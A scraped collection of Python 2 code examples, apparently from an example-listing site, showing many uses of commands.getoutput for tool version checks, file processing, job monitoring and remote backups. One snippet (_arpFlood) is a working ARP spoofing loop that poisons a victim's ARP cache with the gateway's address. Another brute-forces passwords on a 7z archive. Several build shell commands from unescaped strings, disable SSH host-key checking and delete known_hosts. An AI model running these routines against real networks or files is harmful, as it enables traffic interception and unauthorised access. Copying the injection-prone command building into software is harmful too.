Beispiel #1
0
 def checkJavaVersion(self):
     javaVersion = commands.getoutput("%s -version" % self.java)
     pattern = re.compile("java\s*version\s*\"([\d\._]+)",re.S)
     match = pattern.match(javaVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 1 or (int(number[0]) == 1 and int(number[1]) < 6):
             self.info = "your jdk version is lower than recommendation"
         elif int(number[0]) == 1 and int(number[1]) == 6:
            self.flag = "OK"
         else:
            self.flag = "WARNING"
            self.info = "your jdk version is higher than recommendation"
     else: self.versionNo = "unknown"
     pattern = re.compile("openjdk")
     match = pattern.match(javaVersion)
     if match:
         self.info = "openjdk is not supported"
         self.flag = "FAIL"
     jdkBit = commands.getoutput("file -bL %s" % self.java)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
     match = pattern.match(jdkBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
     result("jdk",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
Beispiel #2
0
  def show(self,*list):

    # create tmp.pdb with atom data
    
    n = list[0]
    self.pdb.single(n,"tmp.pdb")

    # if RasMol input script specified, read it
    # replace load pdb "file" with load pdb "%s"
    # if no RasMol input script specified, use rasmol_template

    if len(list) == 2:
      rasmol_text = open(list[1],"r").read()
      rasmol_text = re.sub('load pdb ".*"','load pdb "%s"',rasmol_text)
    else:
      rasmol_text = rasmol_template

    # write rasmol_text to tmp.rasmol, substituting tmp.pdb for filename
    
    f = open("tmp.rasmol","w")
    text = rasmol_text % "tmp.pdb"
    print >>f,text
    f.close()

    # run RasMol to create image in tmp.gif
    
    self.start()
    self.__call__("source tmp.rasmol")
    self.__call__("write tmp.gif")
    self.stop()

    # display the image
    
    cmd = "%s tmp.gif" % (PIZZA_DISPLAY)
    commands.getoutput(cmd)
Beispiel #3
0
def dotest(path, python, results):
    if not os.path.exists(path):
        return
    if os.path.isdir(path):
        abs_path = os.path.abspath(path)
        for p in os.listdir(abs_path):
            dotest(os.path.join(abs_path,p), python, results)
    else:
        case_path = os.path.abspath(path)
        if case_path.endswith('.yaml'):
            commands.getoutput('%s data2case.py %s' % (python, case_path))
            c_path, c_name = os.path.split(case_path)
            c_name = c_name.rstrip('.yaml')
            print 'CASE %s is running ......' % c_name 
            output, errput= execmd('%s %s.py'%(python, case_path.split('.yaml')[0]))
            os.system('rm -f %s.py'%case_path.split('.yaml')[0])
            tmp = errput.split('\n')
            if tmp[-2] != 'OK':
                tmp[2] = 'FAIL: %s' % c_name
                results[c_name] = 'FAIL'
                print ''.join(['CASE %s ...... ', colorPrintMessage('r', 'FAIL')]) % c_name
                writeTempLog(c_name, output + '\n'.join(tmp[1:-5])+ '\n')
            else:
                results[c_name] = 'PASS'
                print ''.join(['CASE %s ...... ', colorPrintMessage('g', 'PASS')]) % c_name
Beispiel #4
0
 def checkGccVersion(self):
     gccVersion = commands.getoutput("%s -v" % self.gcc)
     pattern = re.compile(".*gcc\s*version\s*([\d\.]+)",re.S)
     match = pattern.match(gccVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 4 \
            or (int(number[0]) == 4 and int(number[1]) < 4) \
            or (int(number[0]) == 4 and int(number[1]) == 4 and int(number[2]) < 3):
             self.info = "your gcc version is lower than recommendation"
         elif int(number[0]) == 4 and int(number[1]) == 4 and int(number[2]) == 3:
            self.flag = "OK"
         else:
            self.flag = "WARNING"
            self.info = "your gcc version is higher than recommendation"
     else: self.versionNo = "unknown"
     gccBit = commands.getoutput("file -bL %s" % self.gcc)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
     match = pattern.match(gccBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
     result("gcc",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
 def _setScenesToAuto(self):
     commands.getoutput('adb shell input swipe 530 6 523 22')
     time.sleep(1)
     d.click(300,185)
     time.sleep(1)
     d.click(710,282)
     time.sleep(1)
def _arpFlood(iface, target):
    conf.iface = iface
    target = target
    pkt = ARP()

    gateway = commands.getoutput("ip route list | grep default").split()[2][0:]
    pkt.psrc = gateway

    pkt.pdst = target

    mac_address = commands.getoutput("ifconfig " + iface).split()[4][0:]
    pkt.hwsrc = mac_address
    
    time.sleep(2)
    print ""
    print "[+] Interface\t\t : %s" % iface
    print "[+] Your Mac Address\t : %s" % mac_address
    print "[+] Gateway\t\t : %s" % gateway
    print "[+] Victim IP Address to : %s" % target
    print "\n[-] CTRL+C to Exit"
    try:
        while 1:
            send(pkt, verbose=0)
            time.sleep(0.5)
    except:
        print '\n[-] Process Stopped'
Beispiel #7
0
 def parse_len(self):
     if self.traj_fn.endswith(".pdb"): # pdb trajectory
         return int(commands.getoutput("awk '/^MODEL /' %s | wc -l" % self.traj_fn).split()[0])
     elif self.traj_fn.endswith(".pdb.gz"): # pdb trajectory
         return int(commands.getoutput("zcat %s | awk '/^MODEL /' | wc -l" % self.traj_fn).split()[0])
     else: # list of pdb files
         return int(commands.getoutput("wc -l %s" % self.traj_fn).split()[0])
Beispiel #8
0
def dumpOutput(filename):
    """ dump an extract from an ascii file """

    ret = ""
    if os.path.exists(filename):
        fsize = os.path.getsize(filename)
        tolog("Filename : %s" % (filename))
        tolog("File size: %s" % str(fsize))
        if fsize > 2**14: # 16k
            tolog("Begin output (first and last 8k)............................................")
            ret = commands.getoutput("head --bytes=8192 %s" % filename)
            if ret == "":
                tolog("[no output?]")
            else:
                # protect against corrupted files containing illegal chars
                try:
                    tolog(str(ret))
                except Exception, e:
                    tolog("!!WARNING!!3000!! Could not dump file: %s" % str(e))
            tolog("\n.... [snip] ....\n")
            ret = commands.getoutput("tail --bytes=8192 %s" % filename)
            if ret == "":
                tolog("[no output?]")
            else:
                # protect against corrupted files containing illegal chars
                try:
                    tolog(str(ret))
                except Exception, e:
                    tolog("!!WARNING!!3000!! Could not dump file: %s" % str(e))
Beispiel #9
0
    def get_disk_usage(self):
        """
        Function return cpu usage on node.
        """
        ret_list = []
        cmd = "df -l | grep -v ^Filesystem "
        result = commands.getoutput(cmd)
        for item in result.splitlines():
            ret_list.append({})    

        col = ("source", "size", "avail", "pcent", "target")
        for item_col in col:
            i = 0
            cmd = "df -l --output=%s | awk 'NR>1 {print $0}'" % item_col
            result = commands.getoutput(cmd)
            for item in result.splitlines():
                ret_list[i][item_col] = item.strip()
                i += 1

        logger.debug(ret_list)
        #delete tmpfs: delete the one that does not begin with '/'
        for index in range(len(ret_list)-1, -1, -1):
            if re.match('/', ret_list[index]["source"]) is None:
                del(ret_list[index])
            else:
                #add column: util
                cmd = "iostat -x %s | grep  -A1 util | tail -1 | awk '{print $NF}' " % ret_list[index]["source"]
                result = commands.getoutput(cmd)
                ret_list[index]['util'] = float(result)*100
                #delete character '%'
                ret_list[index]['pcent'] = ("%.2f" % float(ret_list[index]['pcent'][:-1]))
            
        return ret_list
Beispiel #10
0
def analyzeoutput_default(st, jobdir):

    jobstat = 0
    if st != 0:
        print "ERROR: trivialPilot: Job script failed. Status=%s" % st
        print "======== Job script run.sh content:"
        print commands.getoutput('cat run.sh')
    else:
        print "!!INFO!!0!!Job script completed OK. Status=0"
    errcodes = commands.getoutput("grep '!!FAILED!!' %s/job.out"%jobdir)
    if len(errcodes) > 0:
        print "---- Synposis of FAILED messages in job:"
        print errcodes
    warncodes = commands.getoutput("grep '!!WARNING!!' %s/job.out"%jobdir)
    if len(warncodes) > 0:
        print "---- Synposis of WARNING messages in job:"
        print warncodes
    infocodes = commands.getoutput("grep '!!INFO!!' %s/job.out"%jobdir)
    if len(infocodes) > 0:
        print "---- Synposis of INFO messages in job:"
        print infocodes
    pat = re.compile('.*!!FAILED!!([0-9]+)!!(.*)$')
    mat = pat.search(errcodes)
    if mat:
        jobstat = 1
    return jobstat
 def __generateAllGraphicsForGroups( self, graphicType ):
     """
         
         @summary : Generated groups graphics based on the 
                    specified graphicType.
         
         @summary graphicType : "daily", "weekly", "monthly", "yearly"
         
         @raise Exception: When graphicType is unknown.
                    
     """
     
     configParameters = StatsConfigParameters( )
     configParameters.getAllParameters()       
         
     supportedGraphicTypes = { "daily": "-d", "weekly":"-w", "monthly":"-m", "yearly":"-y" }
     
     if graphicType not in supportedGraphicTypes:
         raise Exception( "Unsupported graphicType detected in __generateAllGraphicsForGroups" )
     
     else: 
         
         for group in configParameters.groupParameters.groups:
             
             groupMembers, groupMachines, groupProducts, groupFileTypes = configParameters.groupParameters.getAssociatedParametersInStringFormat( group )
             
             groupMachines = str(groupMachines).replace( "[", "" ).replace( "]", "" ).replace( "'", "" ).replace( '"','' )
              
             if graphicType == "daily":
                 commands.getstatusoutput( '%sgenerateGnuGraphics.py -g %s -c %s --combineClients --copy -d "%s"  -m %s -f %s -p %s  -s 24 --outputLanguage %s' %( self.paths.STATSBIN, group, groupMembers, self.timeOfRequest, groupMachines, groupFileTypes, groupProducts, self.outputLanguage ) )
                 #print  '%sgenerateGnuGraphics.py -g %s -c %s --combineClients --fixedCurrent --copy -d "%s"  -m %s -f %s -p %s  -s 24 --language %s' %( self.paths.STATSBIN, group, groupMembers, self.timeOfRequest, groupMachines, groupFileTypes, groupProducts, self.outputLanguage )
             
             else:    
                 commands.getoutput("%sgenerateRRDGraphics.py %s --copy -f %s --machines '%s'  -c %s --date '%s' --fixedCurrent --language %s" %( self.paths.STATSBIN, supportedGraphicTypes[ graphicType], groupFileTypes, groupMachines, group, self.timeOfRequest, self.outputLanguage ) )
                 print "%sgenerateRRDGraphics.py %s --copy -f %s --machines '%s'  -c %s --date '%s' --fixedCurrent --language %s" %( self.paths.STATSBIN, supportedGraphicTypes[ graphicType], groupFileTypes, groupMachines, group, self.timeOfRequest, self.outputLanguage )    
def parse_log(results_filename):
    """
    Parse the log file from a results packet.

    ARGUMENTS

    results_filename (string) - name of compressed results file to test

    RETURNS

    logtext - text of log file
    logdata - dict of important log contents

    """

    # Create temporary directory.
    import os, os.path, tempfile, shutil

    cwd = os.getcwd()
    tmpdir = tempfile.mkdtemp()

    # Extract source directory.
    [directory, filename] = os.path.split(results_filename)

    # Copy results to temporary directory.
    shutil.copyfile(results_filename, os.path.join(tmpdir, "results.tar.bz2"))

    # Change to temporary directory.
    os.chdir(tmpdir)

    # Extract payload and results.
    import commands

    command = "bzcat results.tar.bz2 | tar x"
    commands.getoutput(command)

    # Read log file.
    log_filename = "log.txt"
    logtext = read_file(log_filename)

    # Extract useful info from log file.
    logdata = dict()
    import re

    for line in logtext.split("\n"):
        m = re.match("^(.+?):(.+)", line)
        if m:
            groups = m.groups()
            key = groups[0].strip()
            value = groups[1].strip()
            logdata[key] = value
            # TODO: Add support for values that can span multiple lines, like Options and Args.

    # Clean up temporary directory.
    os.chdir(cwd)
    for filename in os.listdir(tmpdir):
        os.unlink(os.path.join(tmpdir, filename))
    os.removedirs(tmpdir)

    return (logtext, logdata)
Beispiel #13
0
def endJob(pid, state, jobstat):
    data = {}
    data['node'] = host
    data['siteName'] = site
    data['jobId'] = pid
    data['schedulerID'] = schedid
    data['pilotID'] = os.environ.get('GTAG', tpid)
    data['state'] = state
    data['timestamp'] = utils.timeStamp()
    data['transExitCode'] = jobstat
    data['computingElement'] = qname

    print "== Updating Panda with completion info"
    status, pars, response = utils.toServer(baseURLSSL,'updateJob',data,os.getcwd())
    if status != 0:
        print "Error contacting dispatcher to update job status: return value=%s" % status
    else:
        if jobstat == 0:
            print "==== PandaID %s successful completion reported to dispatcher" % pid
            print "!!FINISHED!!0!!PandaID %s done" % pid
        else:
            print "==== PandaID %s failed completion reported to dispatcher" % pid
            print "!!FAILED!!2999!!PandaID %s done" % pid
    print "==== Directory at job completion:"
    print commands.getoutput('pwd; ls -al')
def thumb_create (images, width=100, height=100):
    ret = 0
    for src, dst in images:
        try:
            w, h = commands.getoutput ('identify ' + src).split ()[2].split ('x')
            w, h, l, t = int (w), int (h), 0, 0

            if w > h:
                l = round ((w - h) / 2)
                w = h
            elif h > w:
                t = round ((h - w) / 2)
                h = w

            commands.getoutput ('convert -crop %dx%d+%d+%d %s %s' % (w, h, l, t, src, dst))
            commands.getoutput ('convert -resize %dx%d %s %s' % (width, height, dst, dst))
#             commands.getoutput ('convert -blur 15 %s %s' % (dst, dst + '.jpg'))
            ret += 1
        except:
            try:
                if os.path.isfile (dst):
                    os.remove (dst)
            except:
                pass

    return ret
Beispiel #15
0
 def iq_getiso(self, iq):
     """
     Get the virtual cdrom ISO of the virtual machine
     
     @type iq: xmpp.Protocol.Iq
     @param iq: the received IQ
     
     @rtype: xmpp.Protocol.Iq
     @return: a ready to send IQ containing the result of the action
     """
     try:
         nodes = []
     
         isos = commands.getoutput("ls " + self.entity.folder).split()
         for iso in isos:
             if commands.getoutput("file " + self.entity.folder + "/" + iso).lower().find("iso 9660") > -1:
                 node = xmpp.Node(tag="iso", attrs={"name": iso, "path": self.entity.folder + "/" + iso })
                 nodes.append(node)
     
         sharedisos = commands.getoutput("ls " + self.shared_isos_folder).split() 
         for iso in sharedisos:
             if commands.getoutput("file " + self.shared_isos_folder + "/" + iso).lower().find("iso 9660") > -1:
                 node = xmpp.Node(tag="iso", attrs={"name": iso, "path": self.shared_isos_folder + "/" + iso })
                 nodes.append(node)
     
         reply = iq.buildReply("result")
         reply.setQueryPayload(nodes)
         self.entity.log.info("info about iso sent")
     except Exception as ex:
         reply = build_error_iq(self, ex, iq, ARCHIPEL_ERROR_CODE_DRIVES_GETISO)
     return reply
Beispiel #16
0
def shout(word, word_eol, userdata):
     global bold_char, audtool_prog
     current = xchat.get_context()
     if audacious_check():
     #playing?
         playing = commands.getstatusoutput(audtool_prog + " playback-playing")
         if (playing[0] == 0):
             song = commands.getoutput(audtool_prog + " current-song")
             artist = commands.getoutput(audtool_prog + " current-song-tuple-data artist")

             total = commands.getoutput(audtool_prog + " current-song-length")
             output = commands.getoutput(audtool_prog + " current-song-output-length")
             final = bold_char + "Now Playing: " + bold_char + song + (" - ") + artist + " (" + output + "/" + total + ")"
             #make sure it's not in a server window
             if ((current.get_info("channel") != current.get_info("server")) and (current.get_info("channel") != current.get_info("network"))):
                 #Say it.
                 xchat.command("msg " + current.get_info("channel") + " " + final)
             else:
                 #Print it
                 current.prnt(final)
         else:
             current.prnt("Check that Audacious is playing!")
     else:
         current.prnt("Check that you have Audacious installed and audtool_prog set properly!")
     #accept the command no matter what happens, to prevent unknown command messages
     return xchat.EAT_XCHAT
Beispiel #17
0
    def detener_grabacion(self, widget=None):

        if self.info_grabar.label.get_text() == _("Stopped recording"):
            return

        estado = str(self.mplayer_server.get_estado())
        self.activar(None, "stop")

        try:
            self.mplayer_server.mplayer.kill()
            self.graba.kill()

        except:
            pass

        commands.getoutput('killall mplayer')
        self.origenes_de_datos.set_permisos()
        self.graba = None
        self.info_grabar.detenido()
        self.mplayer_server = Mplayer_Reproductor(self.pantalla.window.xid)
        self.mplayer_server.connect("cambio_estado", self.cambio_estado)
        self.mplayer_server.connect("update_progress", self.update_progress)
        self.mplayer_server.connect("video", self.video)
        #self.mplayer_server.connect("mplayer_info", self.mplayer_info)

        if "playing" in estado:
            self.activar(None, "pausa-play")
Beispiel #18
0
def test_cmd(p):
    try:
        zpath = '~/Desktop'
        target = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
        #~ for i in target:
            #~ pass

        #~ cmd = "7z l ~/Desktop/desttree.7z -p" + p
        cmd = "7z l ~/Pictures/IMGS.7z -p" + p
        output = commands.getstatusoutput(cmd)  #有返回值
        #~ outputs = commands.getoutput(cmd)    #无返回值
        if output[0] is 0:
            logcmd = 'echo ' + cmd + ' >> ' + zpath + '/' + target
            commands.getoutput(logcmd)
            dt = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            print 'End. Now, it is ' + dt
            return 'Done. PASSWORD is ' + p
        else:
            return 0

        #~ print "GET STATUS OUT PUT: " , output
        #~ print "GET OUT PUT: %s" % outputs
    except Exception, e:
        print e
        return 0
Beispiel #19
0
def run_condor_jobs(c, config_file, subject_list_file, p_name):
    '''
    '''

    # Import packages
    import commands
    from time import strftime

    try:
        sublist = yaml.load(open(os.path.realpath(subject_list_file), 'r'))
    except:
        raise Exception ("Subject list is not in proper YAML format. Please check your file")

    cluster_files_dir = os.path.join(os.getcwd(), 'cluster_files')
    subject_bash_file = os.path.join(cluster_files_dir, 'submit_%s.condor' % str(strftime("%Y_%m_%d_%H_%M_%S")))
    f = open(subject_bash_file, 'w')

    print >>f, "Executable = /usr/bin/python"
    print >>f, "Universe = vanilla"
    print >>f, "transfer_executable = False"
    print >>f, "getenv = True"
    print >>f, "log = %s" % os.path.join(cluster_files_dir, 'c-pac_%s.log' % str(strftime("%Y_%m_%d_%H_%M_%S")))

    sublist = yaml.load(open(os.path.realpath(subject_list_file), 'r'))
    for sidx in range(1,len(sublist)+1):
        print >>f, "error = %s" % os.path.join(cluster_files_dir, 'c-pac_%s.%s.err' % (str(strftime("%Y_%m_%d_%H_%M_%S")), str(sidx)))
        print >>f, "output = %s" % os.path.join(cluster_files_dir, 'c-pac_%s.%s.out' % (str(strftime("%Y_%m_%d_%H_%M_%S")), str(sidx)))

        print >>f, "arguments = \"-c 'import CPAC; CPAC.pipeline.cpac_pipeline.run( ''%s'',''%s'',''%s'',''%s'',''%s'',''%s'',''%s'')\'\"" % (str(config_file), subject_list_file, str(sidx), c.maskSpecificationFile, c.roiSpecificationFile, c.templateSpecificationFile, p_name)
        print >>f, "queue"

    f.close()

    #commands.getoutput('chmod +x %s' % subject_bash_file )
    print commands.getoutput("condor_submit %s " % (subject_bash_file))
Beispiel #20
0
 def test_TypeMax_Overflow(self):
     """
     Testing UINT8 parameter value out of positive range
     ---------------------------------------------------
         Test case description :
         ~~~~~~~~~~~~~~~~~~~~~~~
             - set UINT8 to 101
         Tested commands :
         ~~~~~~~~~~~~~~~~~
             - [setParameter] function
         Used commands :
         ~~~~~~~~~~~~~~~
             - [getParameter] function
         Expected result :
         ~~~~~~~~~~~~~~~~~
             - error detected
             - UINT8 parameter not updated
             - Blackboard and filesystem values checked
     """
     log.D(self.test_TypeMax_Overflow.__doc__)
     log.I("UINT8 parameter max value out of bounds = 101")
     value = "101"
     param_check = commands.getoutput('cat $PFW_RESULT/UINT8')
     #Set parameter value
     out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
     assert err == None, log.E("when setting parameter %s : %s"
                               % (self.param_name, err))
     assert out != "Done", log.F("PFW : Error not detected when setting parameter %s out of bounds"
                                 % (self.param_name))
     #Check parameter value on filesystem
     assert commands.getoutput('cat $PFW_RESULT/UINT8') == param_check, log.F("FILESYSTEM : Forbiden parameter change")
     log.I("test OK")
Beispiel #21
0
    def _cvs_release(self):
        """
        Sync spec file/patches with CVS, create tags, and submit to brew/koji.
        """

        self._verify_cvs_module_not_already_checked_out()

        print("Building release in CVS...")
        commands.getoutput("mkdir -p %s" % self.working_dir)
        debug("cvs_branches = %s" % self.cvs_branches)

        self.cvs_checkout_module()
        self.cvs_verify_branches_exist()

        # Get the list of all sources from the builder:
        self.builder.tgz()

        self.cvs_sync_files()

        # Important step here, ends up populating several important members
        # on the builder object so some of the below lines will not work
        # if moved above this one.
        self.cvs_upload_sources()

        self._cvs_user_confirm_commit()

        self._cvs_make_tag()
        self._cvs_make_build()
Beispiel #22
0
def getCatalog(folder,corr):
    
    if not os.path.isdir(folder):
        catalog_plus  = ''        
        catalog_minus = ''
        
        print 'ERROR: DATA folder %s does not exist: the plots will not have data point' % folder
        exit(1)

    catalog_plus  = commands.getoutput("ls %s | grep -i %s | grep  plus" % (folder, corr) ).split()
    catalog_minus = commands.getoutput("ls %s | grep -i %s | grep minus" % (folder, corr) ).split()
    
    if len(catalog_plus)==0:
        print "ERROR (getCatalog): no positive kick response measurements"
        exit(1)

    if len(catalog_minus)==0:
        print "ERROR (getCatalog): no negative kick response measurements"
        exit(1)

    if len(catalog_plus)!=len(catalog_minus):
        print "ERROR (getCatalog): different number of positive and negative kick response measurements"
        print "len(catalog_plus)=%d" % len(catalog_plus)
        print "len(catalog_minus)=%d" % len(catalog_minus)
        exit(1)
        
    return catalog_plus,catalog_minus
Beispiel #23
0
def remote_session_scp(send_file='/bin/ls'):
   
    """ Create remote session copy file. 
        scp 100M file spend 200s, the spead is 0.5MB
    eg. $>scp xxx root@ip:/root/
    """

    F_ret = 0
    try:
        index = 0

        if download:
	    run_cmd = 'scp -o "StrictHostKeyChecking=no" -o "GSSAPIAuthentication=no" root@%s:%s .' % (remote_ip, send_file)
	else:
	    run_cmd = 'scp -o "StrictHostKeyChecking=no" -o "GSSAPIAuthentication=no" %s root@%s:/root/' % (send_file, remote_ip)

        print_debug(run_cmd)
        warning = 'WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!'
        for i in range(1,10):
            remote_session  = pexpect.spawn(run_cmd)
            remote_session.logfile = sys.stdout
            index = remote_session.expect(['[Pp]assword:\s+', warning, pexpect.EOF], timeout=120)
            if index == 1:
                commands.getoutput('rm -rf ~/.ssh/known_hosts')
                remote_session.terminate()
            else:
                break
        if index == 0:
            remote_session.sendline('%s' % root_password)
        index = remote_session.expect_exact(['100%', pexpect.EOF], timeout=1800)
        if index != 0:
            F_ret += 1
    except Exception,e:
        print  'remote_session_scp (%s) -> unexpected issue: %s' % (send_file,e)
        F_ret += 1
Beispiel #24
0
def backUpVM(uuid, xs_name):
	'''
	backs up a single VM with uuid=/UUID/OF/VM and xs_name=/NAME/OF/VM
	using the follwoing methodology:
		1) checks and ejects dvd from vm if neccessary
		2) takes snapshot of VM
		3) removes any lingering copies
		4) backup vm from snapshot
		5) fixes permissions
		6) deletes snapshot we created...we are not slobs
	'''
#	need to run as root
	env.user='******'
	env.key_filename = "/root/.ssh/id_rsa"
	today = str(datetime.date.today())
#	determine start time
	stime = time.time()
#	cast variables as strings to protect from spaces
	uuid = str(uuid)
	xs_name = re.escape(str(xs_name))
#	dates for file names
#	gets dates for file/folder name
	year = datetime.date.today().strftime("%Y")
	month = datetime.date.today().strftime("%m")
	day = datetime.date.today().strftime("%d")
#	gets the sr base path
	sr_base = '/var/run/sr-mount'
	sr_uuid = str(run('xe sr-list tags=backup-sr | grep uuid | cut -f2 -d":" | tr -d [:blank:]'))
	filename =  str(sr_base + '/' + sr_uuid + '/'+ year + '/' + month + '-' + day + '/' + xs_name +  ".xva")
	#this ejects any cd
	dvdstate = run('xe vm-cd-list uuid='+ uuid + ' | grep "empty ( RO)" | awk \'{print $4}\'')
	if dvdstate == "false":
		print 'removing any cd\'s from: ', xs_name
		run('xe vm-cd-eject vm=' + xs_name)
	#this deletes existsing backup if named same
	print 'filename: ', filename
	print 'running initial snapshot'
#	this command creates a snapshot
	snapshot_vm_cmd = run('xe vm-snapshot uuid=' + uuid + ' new-name-label=' + xs_name + '-' + today)
	snapshot_uuid = str(commands.getoutput(snapshot_vm_cmd).replace("sh: 1: ","").replace(": not found",""))
	print 'done creating snapshot: ', snapshot_uuid
#	this command sets HA to NAY for template
	print 'setting template for HA to NAY'
	backup_vm_cmd = 'xe template-param-set is-a-template=false ha-always-run=false uuid=' + snapshot_uuid
	commands.getoutput(backup_vm_cmd)
	print 'done setting template options'
#	delete any lingering copies
	print 'checking if ' + filename + 'exists'
	run('rm -f ' + filename)
#	this exports the snapshot we created as a vm
	backup_vm_cmd = run('xe vm-export vm=' + snapshot_uuid + ' filename=' + filename)
	commands.getoutput(backup_vm_cmd)
	print 'done creating clone'
	run('chmod 660 ' + filename)
	etime = time.time()
	ttime = (etime - stime)
	run('echo ' + filename + '-'  + str(ttime) + ' >> ' + sr_base + '/' + sr_uuid + '/' + year + '/' + month + '-' + day + '/backup.log')
	#removing old snapshot
	run('xe snapshot-uninstall snapshot-uuid=' + snapshot_uuid + ' force=true')
	print 'does this still exist? ', snapshot_uuid
Beispiel #25
0
def remote_session_run(args_cmd='ls'):
   
    """ Create remote run session. 
    eg. $>ssh root@ip 'commands'
    """

    F_ret = 0
    try:
        index = 0
        ssh_cmd = 'ssh -o "StrictHostKeyChecking=no" -o "GSSAPIAuthentication=no" '
        run_cmd = '%s root@%s \"%s\" ; echo \"echo_result=\"$?\"' % (ssh_cmd, remote_ip, args_cmd)

        warning = 'WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!'
        for i in range(1,10):
            remote_session  = pexpect.spawn(run_cmd)
            remote_session.logfile = sys.stdout
            index = remote_session.expect(['[Pp]assword:\s+', warning, pexpect.EOF], timeout=120)
            if index == 1:
                commands.getoutput('rm -rf ~/.ssh/known_hosts')
                remote_session.terminate()
            else:
                break
        if index == 0:
            remote_session.sendline('%s' % root_password)
        index = remote_session.expect_exact(['echo_result=0', pexpect.EOF], timeout=100)
        if index != 0:
            F_ret += 1
    except Exception,e:
        print  'remote_session_run (%s) -> unexpected issue: %s' % (args_cmd,e)
        F_ret += 1
Beispiel #26
0
 def checkFlexVersion(self):
     flexVersion = commands.getoutput("%s --version" % self.flex)
     pattern = re.compile("flex\s*([\d\.]+)",re.S)
     match = pattern.match(flexVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 2 or (int(number[0]) == 2 and int(number[1]) < 5):
             self.info = "your flex version is lower than recommendation"
         elif int(number[0]) == 2 and int(number[1]) == 5:
            self.flag = "OK"
         else:
            self.flag = "WARNING"
            self.info = "your flex version is higher than recommendation"
     else: self.versionNo = "unknown"
     flexBit = commands.getoutput("file -bL %s" % self.flex)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
     match = pattern.match(flexBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
     result("flex",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
Beispiel #27
0
 def checkGperfVersion(self):
     gperfVersion = commands.getoutput("%s --version" % self.gperf)
     pattern = re.compile("GNU\s*gperf\s*([\d\.]+)",re.S)
     match = pattern.match(gperfVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 3:
             self.info = "your gperf version is lower than recommendation"
         elif int(number[0]) == 3 and int(number[1]) == 0:
            self.flag = "OK"
         else:
            self.flag = "WARNING"
            self.info = "your gperf version is higher than recommendation"
     else: self.versionNo = "unknown"
     gperfBit = commands.getoutput("file -bL %s" % self.gperf)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
     match = pattern.match(gperfBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
     result("gperf",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
def create_story_thumbnail(story, save_path):
    """ Take first page of story and create a composite image of page
        then resize it to our thumbnail size. Recall that the default
        story page is 1280x800
    """

    if not os.path.exists(save_path):
        os.makedirs(save_path)

    page = story.page_set.get(page_number=0)
    pmos = page.pagemediaobject_set.filter(media_type="image").order_by("z_index")
    comp_info = ""
    for pmo in pmos:
        if pmo.download_media_url:
            filename = save_path + os.path.split(pmo.download_media_url)[1]
            comp_info += filename + " " + " -geometry +" + str(pmo.xcoor) + "+" + str(pmo.ycoor) + " -composite "

    cmd1 = "convert -size 1280x800 xc:white " + comp_info + save_path + "thumbnail_icon_large.png"
    commands.getoutput(cmd1)

    # NOTE: this will preserve aspect ratio and result in image
    # that has an x or y no greater than STORY_THUMBNAIL_SIZE
    cmd2 = "convert -resize {0}x{0} {1}thumbnail_icon_large.png {1}thumbnail_icon.png".format(
        STORY_THUMBNAIL_SIZE, save_path
    )
    result = commands.getoutput(cmd2)

    # if result not '' then some type of error
    return True if result == "" else False
Beispiel #29
0
 def checkEabiVersion(self):
     eabiVersion = commands.getoutput("%s --version" % self.eabigcc)
     pattern = re.compile("arm-linux-androideabi-gcc.*?([\d\.]+)",re.S)
     match = pattern.match(eabiVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 4 \
            or (int(number[0]) == 4 and int(number[1]) != 8): 
             self.info = "your arm-linux-androideabi-gcc version is not recommendation"
         elif int(number[0]) == 4 and int(number[1]) == 8:
            self.flag = "OK"
     else:
         self.versionNo = "unknown version"
         self.info = "eabigcc: %s \n version info: %s \n" % (self.eabigcc,eabiVersion)
     eabiBit = commands.getoutput("file -bL %s" % self.eabigcc)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
     match = pattern.match(eabiBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
         self.info += "Bit info:%s " % eabiBit
     result("arm-linux-androideabi-gcc",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
Beispiel #30
0
def update():
	#arpテーブルをアップデートして出力
	com = "ping -c 3 133.101.51.255"
	commands.getoutput(com)
	out = commands.getoutput("arp -a")
	print out
	return out.splitlines()
Beispiel #31
0
def GenerateUUID():
    """Call unix uuid command to generate a universal unique id.

  Returns: string containing the output of uuidgen program.
  """
    return commands.getoutput('uuidgen')
   WritePoolFile = LArCalib_Flags.WritePoolFile

if not 'WriteIOV' in dir():
   WriteIOV = LArCalib_Flags.WriteIOV

if not 'IOVBegin' in dir():
   IOVBegin = int(RunNumberList[0])
   
if not 'IOVEnd' in dir():
   IOVEnd = LArCalib_Flags.IOVEnd

if not 'DBConnectionCOOL' in dir():  
   DBConnectionCOOL = "oracle://ATLAS_COOLPROD;schema=ATLAS_COOLOFL_LAR;dbname=CONDBR2;"   

if not 'OutputPedAutoCorrRootFileDir' in dir():
   OutputPedAutoCorrRootFileDir  = commands.getoutput("pwd")
   
